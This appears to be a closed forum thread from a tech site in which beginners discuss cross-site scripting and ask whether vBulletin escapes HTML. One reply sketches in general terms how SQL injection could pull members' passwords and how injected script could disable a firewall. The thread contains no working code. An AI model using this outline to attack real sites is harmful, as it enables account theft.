Cross Site Scripting

Status
Not open for further replies.
Phantasm66

Phantasm66

Posts: 4,909   +8
My new thing I'm into is Cross Site Scripting (XSS). This is how you manipulate URLs and user input into Web Applications in order to exploit security holes. Even the websites of major banks have these kinds of problems.

A forum like this is a prime example, where some kind of malicious code could be injected into the page - say in a post - and executed by everyone who visits the page.

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Recently, vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits.
Click to expand...

http://en.wikipedia.org/wiki/XSS

Watch the movie !!! : http://ruslug.rutgers.edu/downloads/geek-movies/whiteHat_hacking_intranets.mp4
 
The article, while a bit deep to me (I'm not very experienced in web programming), was interesting. So would an XSS hole result if somebody would type malicious HTML code into a message on TS? Or would the forum have to support HTML code for it to work?
 
Software like this forum has these kinds of flaws, yes.

I don't know what they specifically are for this software, or the version, but doubtless there will be all sorts of things you can do.

One example would be a SQL query injected which could query the metadata tables. From there you could work out the table that held the usernames and passwords. If you could somehow read this table by further injecting SQL then you could find all the members passwords and log in as someone else.

SQL injection is just one possible technique, though. Another might be to have javascript embedded in this page that, when ran on YOUR machine, does something malicious like calls a active X control to change something in your registry, or turn your firewall off.
 
but how could a user inject that code into the page? It seems that vBulletin automatically changes < and > signs into the & lt; and & gt; (omit spaces) so that they aren't mistaken by the browser for HTML code.

Wouldn't it be dangerous to have a vB forum with HTML allowed, though?

TS's Posting Rules said:
vB code is On
Smilies are On
code is On
HTML code is Off[/quote]

That HTML code thingy seems to say that vBulletin would support it if TS would allow it. Kinda scary when you think of the type of HTML code people could put there. I'd guess it would be possible to embed a malicious Flash object or something (via <param>).
Click to expand...
 
I'm no expert (at this stage), but I'd say that if the software properly sanitized user input to prevent scripting or sql from being injected ( vBulletin automatically changing < and > signs sounds like a good start ), then it would be safe. But then again, I'm just starting to learn about this myself.

If anyone else has any insights I'd love to hear them.
 
Well, as a test, I'll give the < and > symbols and check the page source to see whether or not vB changes them to the & gt; and & lt.
 
Status
Not open for further replies.

Similar threads

A
Buffer overflow-type memory bugs remain the most dangerous vulnerabilities out there
Replies
1
Views
334
trieste1s
T
Daniel Sims
A new pixel-stealing exploit can read usernames and passwords across websites
Replies
7
Views
506
Crinkles
Crinkles
A
Some QNAP NAS devices affected by a critical vulnerability, updates available right now
Replies
4
Views
175
Puiu
Puiu

Latest posts

Back